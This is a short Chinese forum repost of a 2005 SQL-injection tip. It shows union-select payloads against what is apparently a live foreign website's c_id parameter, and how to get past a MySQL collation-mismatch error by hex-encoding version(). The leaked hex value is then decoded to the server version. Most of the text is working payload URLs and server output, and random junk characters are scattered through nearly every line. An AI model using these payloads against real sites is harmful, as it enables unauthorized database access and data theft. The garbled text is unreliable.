本文作者:SuperHei
- W1 Z9 D# Q x1 }( l) [9 u文章性质:原创; f) {0 Q( }+ g( o3 I5 Y; k$ ^
发布日期:2005-10-18
/ P$ C& s% f2 N1 c8 e! W* d0 `测试个国外的站时:
* k# v1 k4 N# Murl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
4 \1 ~0 p; w, N返回错误:1 ]* ^ Y1 H M8 m
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'4 d- V1 ~* u# g6 G5 ^
MySQL Error No. 126' t9 D2 D1 Z! e
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。! E& R4 w0 K0 v# x- O
解决办法:转为其他编码如hex。
( b0 A9 [+ x4 d1 S; l% i+ J& Eurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*) A$ x! k1 T) m
成功得到hex(version())的值为:* A8 \+ N; g P: q% h- x
342E312E332D626574619 p0 W* i4 T6 L, e# g
回Mysql查询下得到:; I- Y0 D* x: e# g1 d3 s) Q+ S! c
mysql> select 0x342E312E332D62657461;
$ P' i3 V" D4 w6 u" H' b/ @+------------------------++ K3 g8 \( I' H1 C3 [, c$ @* E
| 0x342E312E332D62657461 |! [: J- Z5 `4 m2 U" P$ ^% P9 n
+------------------------+
+ O; D. A" G- C* m3 ^# a' \| 4.1.3-beta |
( T% [4 u! [" f" M& O, z& [; k" j+------------------------+7 [* `- E1 V. |" [- d& q
1 row in set (0.00 sec)& T" G# i) s- q8 v5 o# Y; N
! b, ~& M7 C4 m! ~# m6 D0 p |
发表于 2012-9-15 14:04:54
收藏
支持
反对